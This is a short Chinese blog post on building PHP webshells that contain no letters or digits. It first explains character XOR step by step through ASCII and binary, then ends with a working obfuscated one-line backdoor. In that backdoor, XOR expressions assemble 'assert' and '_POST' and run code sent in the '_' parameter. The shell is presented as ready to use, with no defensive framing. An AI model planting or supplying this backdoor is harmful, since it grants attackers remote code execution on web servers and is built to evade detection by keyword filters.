No character shell study

  1. 前言
  2. 正文

前言

这篇博文是看了无字母数字Webshell之提高篇 - FreeBuf互联网安全新媒体平台,进行了一定的研究然后对异或进行了研究,从一开始的懵懵逼逼到后面的总结。
408f46a15ffa133d0a5e418dfb2d0b2e.JPG

正文

先说说什么的异或吧,比如说:

<?php
    echo "A"^"?";
?>

结果是~,为什么是 ~(懵逼)

异或过程:
先将异或的两个字符串转换为ASCII码
A的ASCII:65
?的ASCII:63

寻找对应的二进制:
ASCII码65的二进制为:0100 0001
ASCII嘛63的二进制位:0011 1111

异或过程,1碰0位1,0碰1为1,其他为0
0100 0001
0011 1111
0111 1110

结果为:01111110

寻找对应的ASCII码:
对应的ASCII码为:126
对应的字符串为:~

然后我们就得到了异或的整一个过程:
字符串->ASCII->二进制->二进制异或的结果->ASCII码->字符串

然后实现一个马子 :

<?php
$_0=("!"^"@").("3"^"@").("3"^"@").("%"^"@").("2"^"@").("4"^"@"); /*assert*/
$_1='_'.(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@");
$_2=$$_1;
$_0($_2[_]);
?>

k9uds0.png

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:No character shell study

本文作者:九世

发布时间:2019-01-18, 13:36:12

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/390d804c.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录